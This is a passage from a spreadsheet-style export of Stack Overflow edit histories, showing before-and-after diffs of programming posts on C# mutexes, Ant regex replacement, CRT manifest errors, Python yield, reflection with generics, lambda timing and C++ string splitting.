            &lt;span class="hljs-keyword"&gt;try&lt;/span&gt;_x000D_
            {_x000D_
                &lt;span class="hljs-keyword"&gt;try&lt;/span&gt;_x000D_
                {_x000D_
                    &lt;span class="hljs-comment"&gt;// note, you may want to time out here instead of waiting forever&lt;/span&gt;_x000D_
                    &lt;span class="hljs-comment"&gt;// edited by acidzombie24&lt;/span&gt;_x000D_
                    &lt;span class="hljs-comment"&gt;// mutex.WaitOne(Timeout.Infinite, false);&lt;/span&gt;_x000D_
                    hasHandle = mutex.WaitOne(&lt;span class="hljs-number"&gt;5000&lt;/span&gt;, &lt;span class="hljs-literal"&gt;false&lt;/span&gt;);_x000D_
                    &lt;span class="hljs-keyword"&gt;if&lt;/span&gt; (hasHandle == &lt;span class="hljs-literal"&gt;false&lt;/span&gt;)_x000D_
                        &lt;span class="hljs-keyword"&gt;throw&lt;/span&gt; &lt;span class="hljs-keyword"&gt;new&lt;/span&gt; TimeoutException(&lt;span class="hljs-string"&gt;"Timeout waiting for exclusive access"&lt;/span&gt;);_x000D_
                }_x000D_
                catch (AbandonedMutexException)_x000D_
                {_x000D_
                    &lt;span class="hljs-comment"&gt;// Log the fact that the mutex was abandoned in another process, it will still get acquired&lt;/span&gt;_x000D_
                    hasHandle = &lt;span class="hljs-literal"&gt;true&lt;/span&gt;;_x000D_
                }_x000D_
_x000D_
                &lt;span class="hljs-comment"&gt;// Perform your work here.&lt;/span&gt;_x000D_
            }_x000D_
            &lt;span class="hljs-keyword"&gt;finally&lt;/span&gt;_x000D_
            {_x000D_
                &lt;span class="hljs-comment"&gt;// edited by acidzombie24, added if statement&lt;/span&gt;_x000D_
                &lt;span class="hljs-keyword"&gt;if&lt;/span&gt;(hasHandle)_x000D_
                    mutex.ReleaseMutex();_x000D_
            }_x000D_
        }_x000D_
    }_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Michael Mrozek</t>
  </si>
  <si>
    <t>unknown6656</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; If you can identify what is to be replaced through a regular expression, I recommend using the &lt;strong&gt;replaceregexp&lt;/strong&gt;&lt;span class="diff-delete"&gt; task&lt;/span&gt;. Here's the doc: &lt;a href="http://ant.apache.org/manual/OptionalTasks/replaceregexp.html" rel="nofollow noreferrer"&gt;http://ant.apache.org/manual/&lt;span class="diff-delete"&gt;.Tasks&lt;/span&gt;/replaceregexp.html&lt;/a&gt; You can call it twice, one for the start tag and other for the end tag.&lt;/p&gt; _x000D_
 &lt;p&gt; The regexp for replacing your &lt;em&gt;&lt;/em&gt; can be a bit cumbersome, since you say you do not want to replace all &lt;em&gt;&lt;/em&gt; tags, but I think this is the easiest way.&lt;/p&gt; _x000D_
 &lt;p&gt; Another option would be to create a custom &lt;span class="diff-delete"&gt;Ant&lt;/span&gt; task to do what you want.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; If you can identify what is to be replaced through a regular expression, I recommend using the&lt;span class="diff-add"&gt; optional task&lt;/span&gt; &lt;strong&gt;replaceregexp&lt;/strong&gt;. Here's the doc: &lt;a href="http://ant.apache.org/manual/OptionalTasks/replaceregexp.html" rel="nofollow noreferrer"&gt;http://ant.apache.org/manual/&lt;span class="diff-add"&gt;OptionalTasks&lt;/span&gt;/replaceregexp.html&lt;/a&gt; You can call it twice, one for the start tag and other for the end tag.&lt;/p&gt; _x000D_
 &lt;p&gt; The regexp for replacing your &lt;em&gt;&lt;/em&gt; can be a bit cumbersome, since you say you do not want to replace all &lt;em&gt;&lt;/em&gt; tags, but I think this is the easiest way.&lt;/p&gt; _x000D_
 &lt;p&gt; Another option would be to create a custom &lt;span class="diff-add"&gt;ant&lt;/span&gt; task to do what you want.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>martin clayton</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Alright, after doing a ton of research and trying almost every managed CPP Redist I can find as well as trying to copy my DLLs locally to the executing directory of the app I cannot figure out what dependencies i'm missing for this mixed mode library.&lt;/p&gt; _x000D_
 &lt;p&gt; Basically I have a large C# &lt;span class="diff-delete"&gt; and&lt;/span&gt; I'm trying to use a mixed mode library I made. On the development machine it works perfect (of course) but deployed when the library needs to be loaded for use it exceptions out because of missing CRT dependencies (I assume).&lt;/p&gt; _x000D_
 &lt;p&gt; I have used dependency walker to check all the DLLs referenced and ensured they exist on the deployment machine with &lt;span class="diff-delete"&gt;excellent&lt;/span&gt; luck, I'm wondering if maybe it's some dependencies that need to be registered that I am missing, but i can't figure out what.&lt;/p&gt; _x000D_
 &lt;p&gt; I get the following exception when code class from the mixed mode library.&lt;/p&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;p&gt; Exception Detail: System.IO.FileLoadException: Could not load file or assembly 'USADSI.MAPI, Version=1.0.3174.25238, Culture=neutral, PublicKeyToken=null' or one of its dependencies. This is incorrect. Reinstalling the application may fix this problem. (Exception from HRESULT: 0x800736B1)&lt;/p&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;p&gt; I am compiling the library using VS2008 SP1 with /clr:oldSyntax specified.&lt;/p&gt; _x000D_
 &lt;p&gt; The intermediate manifest looks like this:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;lt;assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'&amp;gt;_x000D_
  &amp;lt;trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"&amp;gt;_x000D_
    &amp;lt;security&amp;gt;_x000D_
      &amp;lt;requestedPrivileges&amp;gt;_x000D_
        &amp;lt;requestedExecutionLevel level='asInvoker' uiAccess='false' /&amp;gt;_x000D_
      &amp;lt;/requestedPrivileges&amp;gt;_x000D_
    &amp;lt;/security&amp;gt;_x000D_
    &amp;lt;dependentAssembly&amp;gt;_x000D_
      &amp;lt;assemblyIdentity type='win32' name='Microsoft.VC90.CRT' version='9.0.21022.8' processorArchitecture='x86' publicKeyToken='1fc8b3b9a1e18e3b' /&amp;gt;_x000D_
    &amp;lt;/dependentAssembly&amp;gt;_x000D_
  &amp;lt;/dependency&amp;gt;_x000D_
&amp;lt;/assembly&amp;gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; I can provide any more information as needed, unfortunately i'm not well versed in making mixed mode libraries so this has thrown me off.&lt;/p&gt; _x000D_
 &lt;p&gt; If anyone can offer any advice I would greatly appreciate it!&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Alright, after doing a ton of research and trying almost every managed CPP Redist I can find as well as trying to copy my DLLs locally to the executing directory of the app I cannot figure out what dependencies i'm missing for this mixed mode library.&lt;/p&gt; _x000D_
 &lt;p&gt; Basically I have a large C# &lt;span class="diff-add"&gt;application and&lt;/span&gt; I'm trying to use a mixed mode library I made. On the development machine it works perfect (of course) but deployed when the library needs to be loaded for use it exceptions out because of missing CRT dependencies (I assume).&lt;/p&gt; _x000D_
 &lt;p&gt; I have used dependency walker to check all the DLLs referenced and ensured they exist on the deployment machine with &lt;span class="diff-add"&gt;no&lt;/span&gt; luck, I'm wondering if maybe it's some dependencies that need to be registered that I am missing, but i can't figure out what.&lt;/p&gt; _x000D_
 &lt;p&gt; I get the following exception when code&lt;span class="diff-add"&gt; tries to instantiate a&lt;/span&gt; class from the mixed mode library.&lt;/p&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;p&gt; Exception Detail: System.IO.FileLoadException: Could not load file or assembly 'USADSI.MAPI, Version=1.0.3174.25238, Culture=neutral, PublicKeyToken=null' or one of its dependencies. This&lt;span class="diff-add"&gt; application has failed to start&lt;/span&gt; &lt;span class="diff-add"&gt;because the application configuration &lt;/span&gt;is incorrect. Reinstalling the application may fix this problem. (Exception from HRESULT: 0x800736B1)&lt;/p&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;p&gt; I am compiling the library using VS2008 SP1 with /clr:oldSyntax specified.&lt;/p&gt; _x000D_
 &lt;p&gt; The intermediate manifest looks like this:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;lt;assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'&amp;gt;_x000D_
  &amp;lt;trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"&amp;gt;_x000D_
    &amp;lt;security&amp;gt;_x000D_
      &amp;lt;requestedPrivileges&amp;gt;_x000D_
        &amp;lt;requestedExecutionLevel level='asInvoker' uiAccess='false' /&amp;gt;_x000D_
      &amp;lt;/requestedPrivileges&amp;gt;_x000D_
    &amp;lt;/security&amp;gt;&lt;span class="diff-add"&gt;_x000D_
  &amp;lt;/trustInfo&amp;gt;_x000D_
  &amp;lt;dependency&amp;gt;&lt;/span&gt;_x000D_
    &amp;lt;dependentAssembly&amp;gt;_x000D_
      &amp;lt;assemblyIdentity type='win32' name='Microsoft.VC90.CRT' version='9.0.21022.8' processorArchitecture='x86' publicKeyToken='1fc8b3b9a1e18e3b' /&amp;gt;_x000D_
    &amp;lt;/dependentAssembly&amp;gt;_x000D_
  &amp;lt;/dependency&amp;gt;_x000D_
&amp;lt;/assembly&amp;gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; I can provide any more information as needed, unfortunately i'm not well versed in making mixed mode libraries so this has thrown me off.&lt;/p&gt; _x000D_
 &lt;p&gt; If anyone can offer any advice I would greatly appreciate it!&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Rup</t>
  </si>
  <si>
    <t>Dead account</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; What is the use of the &lt;code&gt;yield&lt;/code&gt; keyword in Python? What does it do?&lt;span class="diff-delete"&gt;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lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; For example, I'm trying to understand this code&lt;sup&gt;&lt;strong&gt;1&lt;/strong&gt;&lt;/sup&gt;:&lt;/p&gt; _x000D_
 &lt;pre class="lang-py s-code-block hljs python"&gt;&lt;code&gt;&lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;def&lt;/span&gt; &lt;span class="hljs-title"&gt;_get_child_candidates&lt;/span&gt;(&lt;span class="hljs-params"&gt;self, distance, min_dist, max_dist&lt;/span&gt;):&lt;/span&gt;_x000D_
    &lt;span class="hljs-keyword"&gt;if&lt;/span&gt; self._leftchild &lt;span class="hljs-keyword"&gt;and&lt;/span&gt; distance - max_dist &amp;lt; self._median:_x000D_
        &lt;span class="hljs-keyword"&gt;yield&lt;/span&gt; self._leftchild_x000D_
    &lt;span class="hljs-keyword"&gt;if&lt;/span&gt; self._rightchild &lt;span class="hljs-keyword"&gt;and&lt;/span&gt; distance + max_dist &amp;gt;= self._median:_x000D_
        &lt;span class="hljs-keyword"&gt;yield&lt;/span&gt; self._rightchild  _x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; And this is the caller:&lt;/p&gt; _x000D_
 &lt;pre class="lang-py s-code-block hljs python"&gt;&lt;code&gt;result, candidates = &lt;span class="hljs-built_in"&gt;list&lt;/span&gt;(), [self]_x000D_
&lt;span class="hljs-keyword"&gt;while&lt;/span&gt; candidates:_x000D_
    node = candidates.pop()_x000D_
    distance = node._get_dist(obj)_x000D_
    &lt;span class="hljs-keyword"&gt;if&lt;/span&gt; distance &amp;lt;= max_dist &lt;span class="hljs-keyword"&gt;and&lt;/span&gt; distance &amp;gt;= min_dist:_x000D_
        result.extend(node._values)_x000D_
    candidates.extend(node._get_child_candidates(distance, min_dist, max_dist))_x000D_
&lt;span class="hljs-keyword"&gt;return&lt;/span&gt; result_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; What happens when the method &lt;code&gt;_get_child_candidates&lt;/code&gt; is called? Is a list returned? A single element? Is it called again? When will subsequent calls stop?&lt;/p&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;sub&gt; 1. The code comes from Jochen Schulz (jrschulz), who made a great Python library for metric spaces. This is the link to the complete source: [Module mspace][1].&lt;/sub&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; What is the use of the &lt;code&gt;yield&lt;/code&gt; keyword in Python? What does it do?&lt;/p&gt; _x000D_
 &lt;p&gt; For example, I'm trying to understand this code&lt;sup&gt;&lt;strong&gt;1&lt;/strong&gt;&lt;/sup&gt;:&lt;/p&gt; _x000D_
 &lt;pre class="lang-py s-code-block hljs python"&gt;&lt;code&gt;&lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;def&lt;/span&gt; &lt;span class="hljs-title"&gt;_get_child_candidates&lt;/span&gt;(&lt;span class="hljs-params"&gt;self, distance, min_dist, max_dist&lt;/span&gt;):&lt;/span&gt;_x000D_
    &lt;span class="hljs-keyword"&gt;if&lt;/span&gt; self._leftchild &lt;span class="hljs-keyword"&gt;and&lt;/span&gt; distance - max_dist &amp;lt; self._median:_x000D_
        &lt;span class="hljs-keyword"&gt;yield&lt;/span&gt; self._leftchild_x000D_
    &lt;span class="hljs-keyword"&gt;if&lt;/span&gt; self._rightchild &lt;span class="hljs-keyword"&gt;and&lt;/span&gt; distance + max_dist &amp;gt;= self._median:_x000D_
        &lt;span class="hljs-keyword"&gt;yield&lt;/span&gt; self._rightchild  _x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; And this is the caller:&lt;/p&gt; _x000D_
 &lt;pre class="lang-py s-code-block hljs python"&gt;&lt;code&gt;result, candidates = &lt;span class="hljs-built_in"&gt;list&lt;/span&gt;(), [self]_x000D_
&lt;span class="hljs-keyword"&gt;while&lt;/span&gt; candidates:_x000D_
    node = candidates.pop()_x000D_
    distance = node._get_dist(obj)_x000D_
    &lt;span class="hljs-keyword"&gt;if&lt;/span&gt; distance &amp;lt;= max_dist &lt;span class="hljs-keyword"&gt;and&lt;/span&gt; distance &amp;gt;= min_dist:_x000D_
        result.extend(node._values)_x000D_
    candidates.extend(node._get_child_candidates(distance, min_dist, max_dist))_x000D_
&lt;span class="hljs-keyword"&gt;return&lt;/span&gt; result_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; What happens when the method &lt;code&gt;_get_child_candidates&lt;/code&gt; is called? Is a list returned? A single element? Is it called again? When will subsequent calls stop?&lt;/p&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;sub&gt; 1. The code comes from Jochen Schulz (jrschulz), who made a great Python library for metric spaces. This is the link to the complete source: [Module mspace][1].&lt;/sub&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;&lt;span class="diff-delete"&gt;Canonical answer: &lt;/span&gt;&lt;a href="http://stackoverflow.com/questions/986909/canonical-binding-generic-somethingt-using-a-type-at-runtime-with-reflection"&gt;&lt;span class="diff-delete"&gt;binding generic Something using a Type at runtime with reflection&lt;/span&gt;&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt; What's the best way to call a generic method when the type parameter isn't known at compile time, but instead is obtained dynamically at runtime?&lt;/p&gt; _x000D_
 &lt;p&gt; Consider the following sample code - inside the Example() method, what's the most concise way to invoke GenericMethod() using the type stored in the myType variable?&lt;/p&gt; _x000D_
 &lt;pre class="lang-cs s-code-block hljs csharp"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;public&lt;/span&gt; &lt;span class="hljs-keyword"&gt;class&lt;/span&gt; &lt;span class="hljs-title"&gt;Sample&lt;/span&gt;_x000D_
{_x000D_
_x000D_
    &lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;public&lt;/span&gt; &lt;span class="hljs-keyword"&gt;void&lt;/span&gt; &lt;span class="hljs-title"&gt;Example&lt;/span&gt;(&lt;span class="hljs-params"&gt;&lt;span class="hljs-built_in"&gt;string&lt;/span&gt; typeName&lt;/span&gt;)&lt;/span&gt;_x000D_
    {_x000D_
        Type myType = FindType(typeName);_x000D_
     _x000D_
        &lt;span class="hljs-comment"&gt;// what goes here to call GenericMethod&amp;lt;T&amp;gt;() ?    &lt;/span&gt;_x000D_
        GenericMethod&amp;lt;myType&amp;gt;(); &lt;span class="hljs-comment"&gt;// This doesn't work&lt;/span&gt;_x000D_
_x000D_
        &lt;span class="hljs-comment"&gt;// what changes to call StaticMethod&amp;lt;T&amp;gt;() ?&lt;/span&gt;_x000D_
        Sample.StaticMethod&amp;lt;myType&amp;gt;(); &lt;span class="hljs-comment"&gt;// This also doesn't work&lt;/span&gt;_x000D_
    }_x000D_
    _x000D_
    &lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;public&lt;/span&gt; &lt;span class="hljs-keyword"&gt;void&lt;/span&gt; &lt;span class="hljs-title"&gt;GenericMethod&lt;/span&gt;&amp;lt;&lt;span class="hljs-title"&gt;T&lt;/span&gt;&amp;gt;(&lt;span class="hljs-params"&gt;&lt;/span&gt;)&lt;/span&gt;_x000D_
    {   _x000D_
        ..._x000D_
    }_x000D_
    _x000D_
    &lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;public&lt;/span&gt; &lt;span class="hljs-keyword"&gt;static&lt;/span&gt; &lt;span class="hljs-keyword"&gt;void&lt;/span&gt; &lt;span class="hljs-title"&gt;StaticMethod&lt;/span&gt;&amp;lt;&lt;span class="hljs-title"&gt;T&lt;/span&gt;&amp;gt;(&lt;span class="hljs-params"&gt;&lt;/span&gt;)&lt;/span&gt;_x000D_
    {   _x000D_
        ..._x000D_
    }    _x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; What's the best way to call a generic method when the type parameter isn't known at compile time, but instead is obtained dynamically at runtime?&lt;/p&gt; _x000D_
 &lt;p&gt; Consider the following sample code - inside the Example() method, what's the most concise way to invoke GenericMethod() using the type stored in the myType variable?&lt;/p&gt; _x000D_
 &lt;pre class="lang-cs s-code-block hljs csharp"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;public&lt;/span&gt; &lt;span class="hljs-keyword"&gt;class&lt;/span&gt; &lt;span class="hljs-title"&gt;Sample&lt;/span&gt;_x000D_
{_x000D_
_x000D_
    &lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;public&lt;/span&gt; &lt;span class="hljs-keyword"&gt;void&lt;/span&gt; &lt;span class="hljs-title"&gt;Example&lt;/span&gt;(&lt;span class="hljs-params"&gt;&lt;span class="hljs-built_in"&gt;string&lt;/span&gt; typeName&lt;/span&gt;)&lt;/span&gt;_x000D_
    {_x000D_
        Type myType = FindType(typeName);_x000D_
     _x000D_
        &lt;span class="hljs-comment"&gt;// what goes here to call GenericMethod&amp;lt;T&amp;gt;() ?    &lt;/span&gt;_x000D_
        GenericMethod&amp;lt;myType&amp;gt;(); &lt;span class="hljs-comment"&gt;// This doesn't work&lt;/span&gt;_x000D_
_x000D_
        &lt;span class="hljs-comment"&gt;// what changes to call StaticMethod&amp;lt;T&amp;gt;() ?&lt;/span&gt;_x000D_
        Sample.StaticMethod&amp;lt;myType&amp;gt;(); &lt;span class="hljs-comment"&gt;// This also doesn't work&lt;/span&gt;_x000D_
    }_x000D_
    _x000D_
    &lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;public&lt;/span&gt; &lt;span class="hljs-keyword"&gt;void&lt;/span&gt; &lt;span class="hljs-title"&gt;GenericMethod&lt;/span&gt;&amp;lt;&lt;span class="hljs-title"&gt;T&lt;/span&gt;&amp;gt;(&lt;span class="hljs-params"&gt;&lt;/span&gt;)&lt;/span&gt;_x000D_
    {   _x000D_
        ..._x000D_
    }_x000D_
    _x000D_
    &lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;public&lt;/span&gt; &lt;span class="hljs-keyword"&gt;static&lt;/span&gt; &lt;span class="hljs-keyword"&gt;void&lt;/span&gt; &lt;span class="hljs-title"&gt;StaticMethod&lt;/span&gt;&amp;lt;&lt;span class="hljs-title"&gt;T&lt;/span&gt;&amp;gt;(&lt;span class="hljs-params"&gt;&lt;/span&gt;)&lt;/span&gt;_x000D_
    {   _x000D_
        ..._x000D_
    }    _x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>jerryjvl</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm writing code like this, doing a little quick and dirty timing:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;var sw = new Stopwatch();&lt;span class="diff-delete"&gt;_x000D_
&amp;nbsp;&lt;/span&gt;_x000D_
sw.Start();_x000D_
for (int i = 0; i &amp;lt; 1000; i++)_x000D_
{_x000D_
    b = DoStuff(s);_x000D_
}_x000D_
sw.Stop();&lt;span class="diff-delete"&gt;_x000D_
&amp;nbsp;&lt;/span&gt;_x000D_
Console.WriteLine(sw.ElapsedMilliseconds);_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Surely there's a way to call this bit of timing code as a fancy-schmancy .NET 3.0 lambda rather than (God forbid) cutting and pasting it a few times and replacing the &lt;strong&gt;&lt;code&gt;DoStuff(s)&lt;/code&gt;&lt;/strong&gt; with &lt;strong&gt;&lt;code&gt;DoSomethingElse(s)&lt;/code&gt;&lt;/strong&gt;?&lt;/p&gt; _x000D_
 &lt;p&gt; I know it can be done as a &lt;code&gt;Delegate&lt;/code&gt;&lt;span class="diff-delete"&gt;,&lt;/span&gt; but I'm wondering &lt;span class="diff-delete"&gt;using&lt;/span&gt; the &lt;strong&gt;&lt;span class="diff-delete"&gt;lambda&lt;/span&gt;&lt;/strong&gt;&lt;span class="diff-delete"&gt; expression&lt;/span&gt;.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm writing code like this, doing a little quick and dirty timing:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;var sw = new Stopwatch();_x000D_
sw.Start();_x000D_
for (int i = 0; i &amp;lt; 1000; i++)_x000D_
{_x000D_
    b = DoStuff(s);_x000D_
}_x000D_
sw.Stop();_x000D_
Console.WriteLine(sw.ElapsedMilliseconds);_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Surely there's a way to call this bit of timing code as a fancy-schmancy .NET 3.0 lambda rather than (God forbid) cutting and pasting it a few times and replacing the &lt;strong&gt;&lt;code&gt;DoStuff(s)&lt;/code&gt;&lt;/strong&gt; with &lt;strong&gt;&lt;code&gt;DoSomethingElse(s)&lt;/code&gt;&lt;/strong&gt;?&lt;/p&gt; _x000D_
 &lt;p&gt; I know it can be done as a &lt;code&gt;Delegate&lt;/code&gt; but I'm wondering &lt;span class="diff-add"&gt;about&lt;/span&gt; the &lt;span class="diff-add"&gt;lambda way&lt;/span&gt;.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Vikrant</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I've been trying to find a free database creator for mac os, and i'm not being able to find any. Anyone know of a free one i could download?&lt;/p&gt; _x000D_
 &lt;p&gt; EDIT: I need that the application generate the sql (mysql in this case) also&lt;span class="diff-delete"&gt;.&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I've been trying to find a free database creator for mac os, and i'm not being able to find any. Anyone know of a free one i could download?&lt;/p&gt; _x000D_
 &lt;p&gt; EDIT: I need that the application generate the sql (mysql in this case) also&lt;span class="diff-add"&gt; :)&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; ty&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Can JQuery and YUI &lt;span class="diff-delete"&gt;coexist without&lt;/span&gt; any conflicts?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Can JQuery and YUI &lt;span class="diff-add"&gt;live together w/o&lt;/span&gt; any conflicts?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>AnonymousThread</t>
  </si>
  <si>
    <t>David Basarab</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; What's the most elegant way to split a string in C++? The string can be assumed to be composed of words separated by whitespace.&lt;span class="diff-delete"&gt;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 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lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;p&gt;(Note that I'm not interested in C string functions or that kind of character manipulation/access. Also, please give precedence to elegance over efficiency in your answer.)&lt;/p&gt; _x000D_
 &lt;p&gt; The best solution I have right now is:&lt;/p&gt; _x000D_
 &lt;pre class="lang-cpp s-code-block hljs"&gt;&lt;code&gt;&lt;span class="hljs-meta"&gt;#&lt;span class="hljs-meta-keyword"&gt;include&lt;/span&gt; &lt;span class="hljs-meta-string"&gt;&amp;lt;iostream&amp;gt;&lt;/span&gt;&lt;/span&gt;_x000D_
&lt;span class="hljs-meta"&gt;#&lt;span class="hljs-meta-keyword"&gt;include&lt;/span&gt; &lt;span class="hljs-meta-string"&gt;&amp;lt;sstream&amp;gt;&lt;/span&gt;&lt;/span&gt;_x000D_
&lt;span class="hljs-meta"&gt;#&lt;span class="hljs-meta-keyword"&gt;include&lt;/span&gt; &lt;span class="hljs-meta-string"&gt;&amp;lt;string&amp;gt;&lt;/span&gt;&lt;/span&gt;_x000D_
_x000D_
&lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;int&lt;/span&gt; &lt;span class="hljs-title"&gt;main&lt;/span&gt;&lt;span class="hljs-params"&gt;()&lt;/span&gt;_x000D_
&lt;/span&gt;{_x000D_
    &lt;span class="hljs-function"&gt;std::string &lt;span class="hljs-title"&gt;s&lt;/span&gt;&lt;span class="hljs-params"&gt;(&lt;span class="hljs-string"&gt;"Somewhere down the road"&lt;/span&gt;)&lt;/span&gt;&lt;/span&gt;;_x000D_
    &lt;span class="hljs-function"&gt;std::istringstream &lt;span class="hljs-title"&gt;iss&lt;/span&gt;&lt;span class="hljs-params"&gt;(s)&lt;/span&gt;&lt;/span&gt;;_x000D_
_x000D_
    &lt;span class="hljs-keyword"&gt;do&lt;/span&gt;_x000D_
    {_x000D_
        std::string sub;_x000D_
        iss &amp;gt;&amp;gt; sub;_x000D_
        std::cout &amp;lt;&amp;lt; &lt;span class="hljs-string"&gt;"Substring: "&lt;/span&gt; &amp;lt;&amp;lt; sub &amp;lt;&amp;lt; std::endl;_x000D_
    } &lt;span class="hljs-keyword"&gt;while&lt;/span&gt; (iss);_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; What's the most elegant way to split a string in C++? The string can be assumed to be composed of words separated by whitespace.&lt;/p&gt; _x000D_
 &lt;p&gt;(Note that I'm not interested in C string functions or that kind of character manipulation/access. Also, please give precedence to elegance over efficiency in your answer.)&lt;/p&gt; _x000D_
 &lt;p&gt; The best solution I have right now is:&lt;/p&gt; _x000D_
 &lt;pre class="lang-cpp s-code-block hljs"&gt;&lt;code&gt;&lt;span class="hljs-meta"&gt;#&lt;span class="hljs-meta-keyword"&gt;include&lt;/span&gt; &lt;span class="hljs-meta-string"&gt;&amp;lt;iostream&amp;gt;&lt;/span&gt;&lt;/span&gt;_x000D_
&lt;span class="hljs-meta"&gt;#&lt;span class="hljs-meta-keyword"&gt;include&lt;/span&gt; &lt;span class="hljs-meta-string"&gt;&amp;lt;sstream&amp;gt;&lt;/span&gt;&lt;/span&gt;_x000D_
&lt;span class="hljs-meta"&gt;#&lt;span class="hljs-meta-keyword"&gt;include&lt;/span&gt; &lt;span class="hljs-meta-string"&gt;&amp;lt;string&amp;gt;&lt;/span&gt;&lt;/span&gt;_x000D_
_x000D_
&lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;int&lt;/span&gt; &lt;span class="hljs-title"&gt;main&lt;/span&gt;&lt;span class="hljs-params"&gt;()&lt;/span&gt;_x000D_
&lt;/span&gt;{_x000D_
    &lt;span class="hljs-function"&gt;std::string &lt;span class="hljs-title"&gt;s&lt;/span&gt;&lt;span class="hljs-params"&gt;(&lt;span class="hljs-string"&gt;"Somewhere down the road"&lt;/span&gt;)&lt;/span&gt;&lt;/span&gt;;_x000D_
    &lt;span class="hljs-function"&gt;std::istringstream &lt;span class="hljs-title"&gt;iss&lt;/span&gt;&lt;span class="hljs-params"&gt;(s)&lt;/span&gt;&lt;/span&gt;;_x000D_
_x000D_
    &lt;span class="hljs-keyword"&gt;do&lt;/span&gt;_x000D_
